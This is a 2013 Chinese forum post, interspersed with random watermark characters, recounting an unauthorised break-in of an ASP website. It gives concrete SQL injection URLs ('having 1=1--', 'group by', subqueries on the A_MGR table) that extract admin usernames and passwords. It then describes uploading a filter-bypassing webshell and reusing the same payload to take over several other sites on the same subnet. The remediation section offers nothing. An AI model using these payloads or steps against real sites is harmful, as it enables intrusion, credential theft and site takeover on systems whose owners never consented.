发现一个注入点
7 p+ g$ x B/ qhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389
% R1 t+ a! M* R+ _4 F) f3 Q3 Q3 j5 C0 n1 x0 Q8 e l
习惯性的加’having1=1--; A" ^7 m, e& ]! Q: m4 _
) V" }3 ?, `) ?2 E" Q8 Y7 jhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
8 V) |1 F6 l5 b7 s2 g( m* M; w0 F) h6 z; ^
0
. f9 ], U n( n4 t
* `& N: }6 ]9 F( m3 C8 s爆出Diary_A.dl_Title(这时候很激动啊)
, c4 Z, y# q$ m, ^. ?+ T- S4 j" c9 w' F9 x
那么继续7 W. M* i) E! w. C
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
1 @$ P8 C9 _7 J4 q3 k1 o `0 H7 G
继续,一直爆下去$ y. k) W& A% v( N
) {& I: m) r4 R' f) J8 d l爆到几个字段和表段 但是没找到需要的管理用户的字段$ j9 g) D9 Z/ U# k+ |* }- j
4 }; l% g$ g7 A% z& u) f5 j
蛋疼了 怎么办 然后去后台登陆页看源码
+ A) _0 Q1 Y3 q0 v
& Q8 B. ?4 m+ M3 @0) ]3 w/ l/ U6 u) O, N
* R5 A* @# b, b: B; d
Input name= “ADUID”2 r/ Q- |9 \4 K* S+ }
Input name= “ADPWD”
. J4 } D7 v }
; Z8 I6 V$ Q! d' u: c4 W很幸运 找到了字段那就继续
/ O1 j& n' Q, K: C* Y+ j6 z找到之后开始爆用户 K8 N _5 W! l( Y3 u
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—6 \. z$ G0 A% [6 A; d, [4 C9 g) }
爆密码
& |; u c/ }: X* E2 k: xhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—' q! m" @- F/ p/ p* i( f8 r% l
测试了下 这个注入点只能爆到文章哪里的表 - t, E& D( O% C/ N0 g* ~1 `) H
( X8 y& T! V1 V: U7 W g, a( o+ I
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
9 b7 a2 X/ J8 u. Q& w4 K* M
; z5 y6 ?7 T5 }. F- l% R2 P$ S又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了6 d9 a" s) O; U( N0 }- `+ S
" w w" P* C3 j, X7 y/ y
4732 S) `. v7 a* j! ~
1 k/ S7 B+ H( t: y o1 d
进后台
- T) U0 h* G n3 }3 _: Z8 d5 o
2 i8 h, v( |( |4 }' S; G' R# E% a. h+ B! v; ~, s
发现几个上传点 有的地方不能上传 而且防止恶意代码
7 r# L& x/ a+ O( a7 Q$ H& a$ B7 M( L0 H! W% y( G& i4 m, {0 J
没办法 各种百度各种找大牛 找到一只好像可以突破的马' Y8 E% ^# o* j. j5 T3 L
5 C2 B3 e+ K' L, a) X$ y
9 F# m0 @+ F: z( r
在系统管理那里直接上传 不过没有显示地址3 B1 Q# g9 _2 w9 H
! _0 L! ~" r" |7 `. U' \+ J再上传一次 抓包 搞定OK" X9 b! G6 q5 T: o7 w
+ ]) X" W6 H. k
) N/ M- ~0 q+ {: D& W0 v% Q& {
7 q D0 W6 h! V% D T+ D# O472
% w" e! h [' [" L8 @3 ~2 x0 L4 I- M2 w' W6 O; j
晚上不行了 去睡觉。。。
7 F1 {, l8 q; ^9 l+ U2 E. A, z第二天刚起床 闲的没事做继续日站吧 / U1 [2 C% S# \
+ y3 [. X" t4 O( Y2 ]0 z找个站 就把这个站的旁c扫了下) Y7 M& a1 u3 X- G$ q7 v
; K5 j- ^# k% A发现c段也有一个购物站 ,然后还和这个站的模板差不多9 c" T5 z! a3 s2 d/ V2 F2 x7 b& d
& _4 A+ {3 a, o8 z
就找到会员登录口测试
9 i7 j" K9 \$ c k& t* `5 x. h4 {3 j; V4 d( I/ V% W4 E& G
'and (select top 1 MGR_UID from A_MGR)>0—" ]! j% G# i* y) P) f
果断爆到了 这时候我很激动 通杀
]( H) y! h6 x
( `" R0 T6 U2 i5 I再次翻c段/ [2 m/ Q( R! n9 O
: d3 m0 l4 c) l% M
翻出几个站 都成功拿下5 e* y7 o0 m, N: W; Q; @/ k
+ |* e* c9 j( G& T
- D7 ?6 o' e* u9 @! `9 z( T3 S
8 O, X7 f! l. A8 O5 W修复方案:3 W+ Y8 N n# C7 U; N0 k$ }
他们比我专业 8 \' E' e0 P. r+ O
5 P& y* y: S* S& v' c8 a
9 ^+ f- l! g* p$ w. r2 f- @7 B# t
5 m7 f6 V, O/ ^3 Y0 r- C# C |
发表于 2013-4-4 17:40:38
收藏
支持
反对